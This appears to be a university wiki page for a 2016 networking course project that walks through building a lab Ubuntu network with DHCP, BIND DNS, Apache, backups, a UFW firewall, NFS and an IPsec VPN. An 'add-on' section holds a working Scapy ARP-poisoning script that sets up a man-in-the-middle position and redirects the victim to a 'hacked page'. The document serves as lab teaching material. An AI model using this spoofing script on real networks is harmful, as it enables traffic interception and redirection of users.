Data Networking/Fall 2016/PAKP
Group Members
[edit | edit source]Ashwin Maniyankode Chandranathan
Kailash Natarajan
Pooja Deshpande
Pranoy Thykkoottathil Jose
Objective
[edit | edit source]The main objective of this project is to build a secure and a dynamic network which has Dynamic Host Configuration Protocol(DHCP),Domain Name Server(DNS), Webserver, Firewall and Backup system using the Linux-Ubuntu operating system.
Behaviour of the Protocols
[edit | edit source]Dynamic Host Configuration Protocol
[edit | edit source]Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of IP addresses (i.e., a scope) configured for a given network.The DHCP server leases an address to any DHCP-enabled client when it starts up on the network. Since IP addresses are dynamic (leased) rather than static (permanently assigned), addresses which are no longer in use are automatically returned to the pool for reallocation. Both IPV4 and IPV6 addresses can be assigned using DHCP server.
DHCP supports three mechanisms for IP address allocation.
- Automatic allocation: DHCP assigns IP address to a client when it gets the requests from them.
- Dynamic allocation: DHCP assigns IP addresses to clients for a specified period of time (or until the client explicitly relinquishes the address). When the lease expires, then the client will have to request for an extension on the lease or request another IP.
- Manual allocation: Using DHCP, we can assign the same IP to a particular device by using its MAC address as an identifier. For example, a server will always have the same IP, even though it is getting it via. the DHCP server.
One or more of these mechanisms will get used depending on the policies of the network administrator.
Domain Name System
[edit | edit source]DNS is an application layer protocol with the ability to translate domain names to IP addresses and vice versa. The basic job of the DNS is to provide simplicity for the application user; i.e. it provides an easier way that will translate the user-friendly domain name to a machine understanding IP address which is then used to fetch and forward data. With the explosion in the use of internet and World Wide Web in commercial, security, social markets among many others, it is not possible for a user to remember the logical IP addresses of the sites. This is where DNS steps in and makes it possible such that the user just needs to remember the user-friendly domain name like www.google.com from which the DNS will translate it into an IP address as 8.8.8.8.
Jumping further into the behavior of the protocol, the DNS stores DNS records for a domain name with corresponding IP addresses and it will respond to queries from the user with answers from its database.
DNS Records are nothing but the database files from which the mappings are fetched. Some of the commonly used DNS records are A, CNAME, MX, PTR, NS.
| RECORD TYPE | EXAMPLE NAME | MAPPED DATA | DESCRIPTION |
|---|---|---|---|
| NS | test.com | dns1.test.com | This record indicates the host/user about the authoritative servers and also provides with information about the Master and Slave servers of the zone. |
| A | dns1.test.com | 192.168.1.1 | This is the most basic type of DNS Record which indicates the 32 bit IPv4 address of the domain, i.e. mapping the FQDN to an IP address. |
| CNAME | test.com | a.test.com | This record maps to the canonical name (CNAME) details for the alias that is mentioned in the FQDN. |
| MX | test.com | mail.test.com | EThis record is used for the mapping of mail exchange server information to a specific domain name. |
| PTR | 192.168.1.1 | dns1.test.com | This is an interesting record type where the user actually has the IP address of the domain from which he can map it to a CNAME, these mappings are stored in this record type. |
Webserver & Firewall
[edit | edit source]A webserver should run on the Linux OS to host a website. Apache2 is the used webserver.A firewall is used to provide a layer of security to control the incoming and outgoing traffic in a network and to block and filter packets to go into the system. The firewall can for a system or even a specific server with bunches of databases or confidential data which is being shielded from unapproved clients in/outside the system.
Signalling
[edit | edit source]Dynamic Host Configuration Protocol
[edit | edit source]1. When a Client, configured with the TCP/IP setting “Obtain an IP address automatically(DHCP)”, plugs into a network, it sends out a broadcast from UDP port 68 to UDP port 67 to “DISCOVER” a DHCP Server (or relay agent).
2.The DHCP Server then responds by sending out an “Offer” (through a relay agent if applicable).
3.Then the client sends out a “Request”, requesting an IP address .
4. This request is finally “Acknowledged” by the server so that the client starts using the IP address.
Domain Name Server
[edit | edit source]1. The requesting host will generate a DNS query packet, which will be passed to the Local DNS Server that is connected to the host network.
2. The Local DNS Server will receive this query and forward this to appropriate Root Name Server. The Root Name Server will check if it is a valid domain and if there are entries for that in its database and reply to the Local DNS.
3. The Local DNS will then send a query to the TLD DNS Server which will send the details of the Authoritative Name Server which will have the details of the mapping address or name.
4. The Local DNS Server will then send a query to the Authoritative Name server seeking the mapping for the domain name or the IP address which was initially sent by the requesting host.
Webserver
[edit | edit source]1.The client initiates a TCP connection with the web server IP provider.
2.The connection involves a 3 way handshake mechanism.
3.First, the clients sends a SYN message requesting TCP connection to the browser at port 80.
4.The server responds with a SYN-ACK message acknowledging the request and requests the client to open a port for the server to send information.
5.The client responds with the ACK message and also sends a request for the HTML page.
Installation Steps
[edit | edit source]DHCP
[edit | edit source]Step 1: Install DHCP server package
sudo apt-get install isc-dhcp-server
Step 2: Edit the isc-dhcp-server file
sudo vim /etc/default/isc-dhcp-server
On line 11 change:
INTERFACES=”ens33”
Save and Exit
Step 3: Configure the DHCP server for ipv4
Editing file /etc/dhcp/dhcpd.conf
sudo vim /etc/dhcp/dhcpd.conf
subnet 192.168.10.0 netmask 255.255.255.0 { range 192.168.10.30 192.168.10.99; option domain-name-servers 192.168.10.10; option subnet-mask 255.255.255.0; option routers 192.168.10.10; option broadcast-address 192.168.10.255; default-lease-time 600; max-lease-time 7200; } iface eth0 inet6 static address 2001:0db8:edfa:1234::1 netmask 64 gateway 2001:0db8:edfa:1234::2
For the servers within the network to always have the same IP, we have matched their MAC addresses with a specific IP.
host dns-server {
hardware ethernet 00:0c:29:8e:69:00;
fixed-address 192.168.10.10;
}
host web-server {
hardware ethernet 00:0c:29:5c:7d:2e;
fixed-address 192.168.10.20;
}
host nfs-server {
hardware ethernet 00:0c:29:8f:8b:d9;
fixed-address 192.168.10.15;
}
Step 4 : Set the static IP address of the DHCP server
sudo vim /etc/network/interfaces
auto lo
iface lo inet loopback
auto ens33
iface ens33 inet static
address 192.168.10.18
netmask 255.255.255.0
gateway 192.168.10.1
broadcast 192.168.10.255
dns-domain-nameserver 192.168.10.10
Step 5: Edit the resolv.conf file
sudo vim /etc/resolv.conf
nameserver 192.168.10.10
Step 6: Restart the DHCP server
sudo /etc/init.d/isc-dhcp-server restart
Step 7: Configuring the DHCPv6 server
Create a file named dhcpd6.conf
sudo vim /etc/dhcp/dhcpd6.conf
#/etc/dhcp/dhcpd6.conf
default-lease-time 86400;
preferred-lifetime 80000;
allow leasequery;
subnet6 2001:0db8:edfa:1234::/64 {
# Range for clients
range6 2001:0db8:edfa:1234:5678::aaaa 2001:0db8:edfa:1234:5678::ffff;
}
DNS Server
[edit | edit source]In this project all the servers are in a private network and the servers receive its IP from the DHCP server. For configuring DNS, we have used Bind9 (Berkeley Internet Name Domain v9) on Ubuntu for resolving hostnames and IP addresses by the clients.
Prerequisite:
To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,
Command:
sudo apt-get update
sudo apt-get install bind9 bind9utils bind9-doc
sudo systemctl daemon-reload
sudo systemctl restart bind9
Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”
Command:
cd /etc/network
sudo nano interfaces
auto eth0
iface eth0 inet static
address 192.168.10.10
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255
gateway 192.168.10.1
Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.
Command:
cd /etc
sudo nano hosts
127.0.0.1 localhost
192.168.10.10 ubuntu.project.com Ubuntu
Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.
Command:
cd /etc
sudo nano hostname
ubuntu.project.com
Step 4: Provide the IP address for the Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.
Command:
cd /etc/resolvconf/resolv.conf.d
sudo nano head
nameserver 192.168.10.10
search project.com
Step 5: For the DNS Server we have to specify the forward and the reverse zones that will provide with the forward and reverse DN resolving. This can be done from the – “/etc/bind/named.conf.local” file.
Command:
#Forward Zone
zone "project.com" {
type master; #specifying if the DNS server is master or slave
file "/etc/bind/db.project.com"; #zone file path
allow-transfer { 192.168.10.11; }; # secondary DNS IP
also-notify { 192.168.10.11; }; };
#Reverse Zone
zone "10.168.192.in-addr.arpa" {
type master; #specifying if the DNS server is master or slave
file "/etc/bind/db.192"; #zone file path
allow-transfer { 192.168.10.11; }; # secondary DNS IP
also-notify { 192.168.10.11; }; };
Step 6: Now to add the forwarder IP for the DNS we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the DNS server which can also be added here.
Command:
options {
forwarders {
192.168.10.1; #forwarder IP for DNS
};
Step 7: Now we have to create the forward and reverse zone which will act as the database from which the DNS server will look-up to resolve for the Domain name or IP address. This database file can be created with reference to the already existing local database file at – “/etc/bind/db.local” file and making our own copy as the – “/etc/bind/db.project.com” file for the forward zone and “/etc/bind/db.192” file for the reverse zone.
Command:
Forward Zone Database:
cd /etc/bind
sudo cp db.local db.project.com
sudo cp db.local db.192
sudo nano /etc/bind/db.project.com
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ubuntu.project.com. root.project.com. (
9 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ubuntu.project.com.
@ IN A 192.168.10.30
ubuntu IN A 192.168.10.30
web IN A 192.168.10.20
www IN CNAME web.project.com.
@ IN AAAA 2001:db8:edfa:1234::15
ubuntu IN AAAA 2001:db8:edfa:1234::15
;
Note:
• The serial number 9 represents the number of times this database file has been edited and make sure you increment it each time the file is edited.
• The @ symbol means that the record applies in all cases not otherwise specified.
• That is followed by IN the record type A or CNAME or AAAA or NS
Reverse Zone Database:
sudo nano /etc/bind/db.192
;
; BIND reverse data file for local loopback interface
;
$TTL 604800
@ IN SOA ubuntu.project.com. root.project.com. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ubuntu.project.com.
30 IN PTR ubuntu.project.com.
20 IN PTR web.project.com.
20 IN PTR www.web.project.com.
5.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.4.3.2.1.a.f.d.e.8.b.d.0.1.0.0.2.ip6.arpa. IN PTR ubuntu.project.com.
;
Note:
• The serial number 6 represents the number of times this database file has been edited and make sure you increment it each time the file is edited.
• The @ symbol means that the record applies in all cases not otherwise specified.
• That is followed by IN the record type PTR or NS
Step 8: Now that we have defined the database and the name servers for the DNS server, we have to restart the server for the configurations to take effect.
Command:
sudo bind9 restart
sudo init 6
Configuring Secondary DNS
The primary DNS will provide with the domain name resolving functionality for the clients. If there is a failure in the primary DNS, then the client will not be able to resolve for the domain name and will be cut off from using the web. In order to overcome this, it is advisable to have a secondary DNS server which will act as a backup in case the primary DSN fails. It is relatively easier to configure the secondary DNS once the primary DNS is configured.
Prerequisite:
To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,
Command:
sudo apt-get update
sudo apt-get install bind9 bind9utils bind9-doc
sudo systemctl daemon-reload
sudo systemctl restart bind9
Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”
Command:
cd /etc/network
sudo nano interfaces
auto eth0
iface eth0 inet static
address 192.168.10.11
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255
gateway 192.168.10.1
Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.
Command:
cd /etc
sudo nano hosts
127.0.0.1 localhost
192.168.10.11 ubuntu.project.com ubuntu
Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.
Command:
cd /etc
sudo nano hostname
ubuntu.project.com
Step 4: Provide the IP address for the Secondary Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.
Command:
cd /etc/resolvconf/resolv.conf.d
sudo nano head
nameserver 192.168.10.11
search project.com
Step 5: For the Secondary DNS Server we have to specify the forward and the reverse zones that will provide with the forward and reverse DN resolving. This can be done from the – “/etc/bind/named.conf.local” file
Command:
#Forward Zone
zone "project.com" {
type slave; #specifying if the DNS server is master or slave
file "/etc/bind/db.project.com"; #zone file path
masters { 192.168.10.10; }; # primary DNS IP
};
#Reverse Zone
zone "10.168.192.in-addr.arpa" {
type slave; #specifying if the DNS server is master or slave
file "/etc/bind/db.192"; #zone file path
masters { 192.168.10.10; }; # primary DNS IP
};
Step 6: Now to add the forwarder IP for the secondary DNS, we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the secondary DNS server which can also be added here.
Command:
options {
forwarders {
192.168.10.1; #forwarder IP for DNS
};
Step 7: Now that we have defined the database and the name servers for the secondary DNS server, we have to restart the server for the configurations to take effect.
Command:
sudo bind9 restart
sudo init 6
Webserver
[edit | edit source]Step 1: To Install Apache2 Webserver
Command:
sudo apt-get install apache2
Step 2: To Check whether the web server is able to listen on port 80
Command:
netstat -a | more
Step 3: To restart the web server
Command:
sudo /etc/init.d/apache2 restart
Step 4: To develop a webpage for the server
Command:
cd /var/www/html
sudo nano index.html
Webserver Backup
[edit | edit source]The protocols used for backup are rsync and ssh.
Rsync is a protocol used to synchronize files in Ubuntu. It updates only that data that is not yet synchronized with the backup file.
Ssh protocol provides a secure channel to send and receive files on Unix machines.It uses encryption and decryption at the end users.
Crontab is used for scheduling backups.
Step 1: Install rsync
sudo apt-get install rsync
Step 2: Install ssh
sudo apt-get install openssh-server
Step 3: Create a public and a private key for security
ssh-keygen -t rsa
Step 4: Append new public key
cat .ssh/id_rsa.pub | ssh ashwinmc1@192.168.10.15 'cat >> .ssh/authorized_keys'
Step 5: Edit crontab
crontab –e
Step 6: Scheduling and run the rsync command from the crontab to automate the backup of the webserver
25**** rsync -avzP --delete -e ssh /var/www/html ashwinmc1@192.168.10.15:/home/ashwinmc1/Backup
Firewall
[edit | edit source]Step 1: Install UFW package
sudo apt-get install ufw
Step 2: Check UFW status
sudo ufw status
Step 3: Set Up Default Policies
sudo ufw default deny incoming
sudo ufw default allow outgoing
Step 4: Allow SSH,http,ftp,https Connections
sudo ufw allow from 192.168.10.0/24 to any port 443
sudo ufw allow from 192.168.10.0/24 to any port 80
sudo ufw allow from 192.168.10.0/24 to any port 21
sudo ufw allow from 192.168.10.0/24 to any port 22
Step 5: Disabling ping
sudo nano /etc/ufw/before.rules Comment out this line: -A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT
Step 6: Enable UFW
sudo ufw enable
Algorithm
[edit | edit source]1. A client tries to connect to the network.
2. Once the client gets connected, he'll try to obtain an IP via DHCP. So a broadcast message will be sent out requesting an IP.
3. The DHCP server will provide an IP address to the client if the request is successful.
Otherwise, 'request fail' message will be obtained and we will need to contact the network administrator for help.
4. The client will now try to access the web server.
If the domain name server details obtained via DHCP is correct, a request will be sent to DNS to resolve the IP address of the domain.
DNS will then reply with IP address of the web page.
else if DNS reply fails, an error message will be displayed saying, ‘server not found.’
else if URL entered is wrong, an error message will be displayed saying, ‘webpage unavailable.’
Retry
5. Client accessed the web server. Now he sends HTTP request to the server.
if the request is successful, the Web page will be displayed
else Error message like ‘no data received’ will be displayed.
Retry
Flow Chart
[edit | edit source]Flow chart has been provided in the project report.
Add-ons Implemented (Additional Features)
[edit | edit source]ARP Poisoning
[edit | edit source]ARP poisoning has been implemented using Scapy.
# Import scapy
from scapy.all import *
# Setting variables
attIP="192.168.10.39"
attMAC="00:0c:29:7b:64:65"
vicIP="192.168.10.40"
vicMAC="00:0c:29:60:af:21"
dgwIP="192.168.10.20"
dgwMAC="00:0c:29:5c:7d:2e"
# Forge the ARP packet for the victim
arpFakeVic = ARP()
arpFakeVic.op=2
arpFakeVic.psrc=dgwIP
arpFakeVic.pdst=vicIP
arpFakeVic.hwdst=vicMAC
# Forge the ARP packet for the default GW
arpFakeDGW = ARP()
arpFakeDGW.op=2
arpFakeDGW.psrc=vicIP
arpFakeDGW.pdst=dgwIP
arpFakeDGW.hwdst=dgwMAC
# While loop to send ARP
# when the cache is not spoofed
while True:
# Send the ARP replies
send(arpFakeVic)
send(arpFakeDGW)
print "ARP sent"
# Wait for a ARP replies from the default GW
sniff(filter="arp and host 10.0.0.1 or host 10.0.0.209", count=1)
NFS
[edit | edit source]Step 1:Configuring the NFS-server
Command:
sudo apt-get install nfs-kernel-server
sudo chmod 777 location
Edit the file
sudo nano /etc/exports
On the last line append below
/home/ashwinmc1/mnt 192.168.10.0/255.255.255.0(rw,sync,root_squash,subtree_check)
Save and Exit
Change the directory
cd /home/ashwinmc1/mnt
touch newfile
sudo nano newfile
Start the server
sudo service nfs-kernel-server start
Step 2:Configuring the NFS-client
Command to Install NFS client:
sudo apt-get install nfs-common
Make directory in a location
sudo mount server ip(192.168.10.15):serverpath(/home/ashwinmc1/mnt) client path(/home/mnt)
sudo reboot
sudo mount -a
IPSEC VPN
[edit | edit source]IPSEC VPN has been implemented using the 'strongswan' package. IPSEC VPN helps make the connection between two servers more secure and it also makes sure that sniffing cannot be done between them.
VPN First Server Configuration
[edit | edit source]Step 1:Installing the 'strongswan' package
Command:
apt-get install ipsec-tools strongswan-starter
Step 2:Making the cryto map entries
Edit the /etc/ipsec.conf file
Command:
vim /etc/ipsec.conf
conn red-to-blue
authby=secret
auto=route
keyexchange=ike
left=192.168.10.100
right=192.168.10.200
type=tunnel
esp=aes128gcm16!
Step 3:Make the PSK entries
We need to edit the /etc/ipsec.secrets file
Command:
vim /etc/ipsec.secrets
192.168.10.100 192.168.10.200 : PSK "project"
Step 4:Restart the ipsec service
Command:
ipsec restart
VPN Second Server Configuration
[edit | edit source]Step 1:Installing the 'strongswan' package
Command:
apt-get install ipsec-tools strongswan-starter
Step 2:Making the cryto map entries
Edit the /etc/ipsec.conf file
Command:
vim /etc/ipsec.conf
conn blue-to-red
authby=secret
auto=route
keyexchange=ike
left=192.168.10.200
right=192.168.10.100
type=tunnel
esp=aes128gcm16!
Step 3:Make the PSK entries
We need to edit the /etc/ipsec.secrets file
Command:
vim /etc/ipsec.secrets
192.168.10.100 192.168.10.200 : PSK "project"
Step 4:Restart the ipsec service
Command:
ipsec restart
Testing
[edit | edit source]DHCP Test
[edit | edit source]If the clients are able to get the IP addresses from the defined range of IP addresses defined in the server pool then the DHCP is working properly.
For example, since the DHCPv4 address pool is assigned from 192.168.10.30 to 192.168.10.99 and the DHCPv6 pool is assigned from 2001:0db8:edfa:1234:5678::aaaa to 2001:0db8:edfa:1234:5678::ffff, if a client gets assigned an IP address of 192.168.10.36 & 2001:0db8:edfa:1234:5678::aaa1 through DHCP, then the DHCP server is assigning IP addresses correctly and is functioning properly.
We can also see the status of the DHCP servers by using the commands:
systemctl status isc-dhcp-server
systemctl status isc-dhcp-server6
DNS Test
[edit | edit source]For testing the functioning and effectiveness of DNS, the following commands will be useful:
1) Dig
The Domain Information Groper is used to query DNS name servers. It performs DNS lookups and returns the response from the name servers.
Eg., We can perform a DIG from the secondary DNS using the following command,
Dig 192.168.10.10 project.com AXFR
This will return with the records from the master server.
2) Ping
Ping is used for checking the network layer status of the server. This can be performed on both the master and the slave DNS to check out if they are reachable from both.
3) Nslookup
nslookup is a command used to query DNS servers. Interactive mode gives permission to the user to query the name servers for getting information about hosts and domains. Non-interactive mode gives permission to the user for printing just the name and the information that is requested for a particular host or domain.
4) Host
Host is used for DNS lookups. It resolves hostnames to IP addresses and vice versa.
Webserver Test
[edit | edit source]Open the web browser and enter the host name or the local IP address. If it is working, then the web server is up and running.
Firewall Test
[edit | edit source]A client can try to ping the servers that are blocked. If the response is 'request timed-out' then, the firewall has blocked the client and it is working as per the firewall rules.
VPN Test
[edit | edit source]To test IPSEC VPN, run a continuous ping from one server to the other. Simultaneously, run the command:
watch ipsec statusall
or
tcpdump esp
if the number of packets increases in the first case, or if you see packets come in the second case, then the IPSEC tunnel is configured properly.
ARP Poisoning Test
[edit | edit source]When the client tries to access the webpage, if he/she is redirected to the hacked page, then APR poisoning has been properly implemented.
Future Scope
[edit | edit source]1. Implementing AAA servers for added security.
2. Additional Firewall rules for added security.
3. Adding Mail servers.
4. Expanding server capabilities.
5. Increase the number of DNS for load distribution and decentralization.
References
[edit | edit source]1. https://help.ubuntu.com/community/isc-dhcp-server
2. https://www.gypthecat.com/ipsec-vpn-host-to-host-on-ubuntu-14-04-with-strongswan
3. https://www.digitalocean.com
4. Computer Networking - A top down approach by Kurose and Ross
5. https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-with-ufw-on-ubuntu-14-04
6. https://kb.iu.edu/d/adov
7. https://blogs.technet.microsoft.com/networking/2009/01/29/dhcp-client-behavior